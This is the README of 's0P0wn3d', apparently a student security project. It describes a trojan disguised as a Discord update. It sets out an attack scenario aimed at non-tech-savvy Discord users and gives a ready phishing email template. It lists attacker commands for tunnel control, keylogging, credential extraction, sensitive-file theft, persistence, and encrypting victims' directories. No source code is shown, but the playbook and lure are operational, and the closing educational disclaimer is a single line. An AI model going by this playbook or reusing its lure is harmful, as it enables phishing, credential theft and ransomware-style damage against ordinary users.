s0P0wn3d is a project demonstrates various techniques for file transfer, persistence, and system information extraction.

• s0P0wn3d 🦠
  • Table of Contents 📑
  • Project Structure 📂
  • Features ✨
  • Usage 🚀
    • Target 🎯
    • Attack Scenario ⚔️
      • Attacker Side 🕵️‍♂️
      • Victim Side 👤
      • Post-Execution 🔍
    • Sending Files 📤
    • Extracting System Information 🖥️
    • Ensuring Persistence 🔄
  • License 📜

. ├── analysis_results
  ├── .gitignore 
  ├── README.md
  ├── T-SEC-901_project.pdf
  ├── custom_handler.py
  ├── discord.py
  ├── receive_file.py
  ├── system_info.log

• File Transfer: Send and receive files over a network.
• Persistence: Ensure the script runs on system startup.
• System Information Extraction: Extract and log system information.
• Tunnel Management: List and switch between active tunnels.
• Directory & File Encryption: Encrypt and decrypt directories or files on the victim's machine.
• Keylogger: Capture keystrokes in the background.
• Sensitive File Extraction: Automatically search and retrieve files containing sensitive data.
• Log Analysis: Analyze system logs and generate visualizations via custom_handler.py.
• Command Management & Helper: Improved command parser, handling Ctrl+C safely, and providing a helper menu.

The target for this attack scenario is individual Discord users, particularly those who are not tech-savvy and may not recognize phishing attempts. This could include casual gamers, students, or employees in small businesses who use Discord for communication.

1. Configure the IP Address: Edit discord.py to include the attacker's IP address.

2. Create Malicious Executable: Use PyInstaller to create an executable from discord.py.

   pyinstaller discord.py

3. Host Fake Web Page: Host a fake web page where the victim can download the malicious executable.

4. Start Handlers: Open two terminals and run the following commands:

   • Terminal 1: Start the custom handler.

     python custom_handler.py

   • Terminal 2: Start the file receiver.

     python receive_file.py

1. Receive Phishing Email: The victim receives a phishing email prompting them to update their Discord application.

Exemple Phishing Email:

Subject: Important: Discord Update Required

Dear Discord User,

We have detected that your current version of Discord is outdated and may contain security vulnerabilities. To ensure the best performance and security, please update your Discord application immediately.

Click the link below to download the latest version:
[Download Discord Update](http://localhost:5050)

Thank you for your prompt attention to this matter.

Best regards,
Discord Support Team

2. Download Malicious Executable: The victim clicks on the link in the email, which leads to the fake web page, and downloads the malicious executable.
3. Execute the File: The victim runs the downloaded executable, believing it to be a legitimate Discord update.

1. List Available Tunnels: On the attacker's terminal running custom_handler.py, list available tunnels.

   list_tunnels

2. Switch Tunnels: Switch to the desired tunnel.

   switch_tunnels <ID>

3. Access Victim's Terminal: Gain access to the victim's terminal through the tunnel.

4. Encrypt Directories: Encrypt a directory on the victim's machine.

   encrypt <DIR> <PASSWORD>

5. Decrypt Directories: Decrypt a directory on the victim's machine.

   decrypt <DIR> <PASSWORD>

6. Analyze Logs: Analyze system logs and generate visualizations.

   analyze_logs

7. Exit: Closes the active tunnel

   exit

To send files, use the send_file function in s0P0wn3d.py:

send_file("IP", 4445, "path/to/file")

To extract system information, use the extract_credentials function in s0P0wn3d.py:

extract_credentials()

To ensure the script runs on system startup, use the ensure_persistence function in s0P0wn3d.py:

ensure_persistence()

This project is intended for educational purposes only.